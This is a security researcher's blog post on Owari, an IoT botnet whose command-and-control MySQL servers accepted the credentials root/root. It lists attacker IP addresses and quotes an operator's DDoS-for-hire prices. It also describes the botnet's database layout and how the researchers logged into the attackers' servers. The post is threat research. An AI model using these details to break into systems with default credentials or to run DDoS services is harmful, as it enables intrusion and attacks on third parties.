Hacker Fail: IoT botnet command and control server accessible via default credentials
In an irony of epic proportions, we observed that an IoT botnet variant, Owari, which relies on default/weak credentials to hack IoT devices was itself using default credentials in its command and control server, allowing read/write access to their server database.
Owari’s MySQL database
Mirai botnet was designed to set up a MySQL server for the command and control containing three tables, namely users, history, and whitelist. While IoT botnets have evolved and many of them have different attack vectors, most of them still retain this tried and tested MySQL server structure, and Owari is no exception to this.
We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.
When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.
We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.
Username: root
Password: root
Database investigation
User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.
In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.
In the history table, we can see DDoS attack carried out against various IPs. Few of these IPs were IoT botnet related which lead us to speculate that the attacker might have tried to attack his rival botnet operators.
In the next table, whitelist which is supposed to have a “do not attack these IPs” information was empty, implying that the bot makes no discrimination, and attacks every device it can.
This IP was not a standalone case with its database exposed via weak credentials. The MySQL database of another attack IP (80.211.45.89) was accessible with “root: root” credentials.
Understanding the revenue model
With some of Owari variant code being leaked in dark forums, it is difficult to pinpoint the people involved in these specific attacks. However, to understand more about the working of this user database we decided to talk to one of the known Owari operators known as “Scarface” who had the following to say on the attack time, cooldown and the related prices charged for such users of Owari botnet.
“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count. I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 costumers per month it is enough to cover most of my virtual expenses”
-Scarface
Remediation
One can assume that once they have the write access to the MySQL database, they can disrupt botnet by deleting the content. Sadly, it’s not such simple in case of most IoT botnets as these CNC related IPs already have a very low shelf life (on an average, a week). Botnet operators are aware that their IPs will be flagged soon due to the bad network traffic. Hence to stay under the radar, they often voluntarily change attack IPs. Both the IPs mentioned in the blog are already offline. NewSky Security IoT Halo protects and remediates against the Owari botnet.
Ankit Anubhav, Principal Researcher, NewSky Security (NewSky Security)
Special thanks to Dr. Vesselin Bontchev (@vessonsecurity)
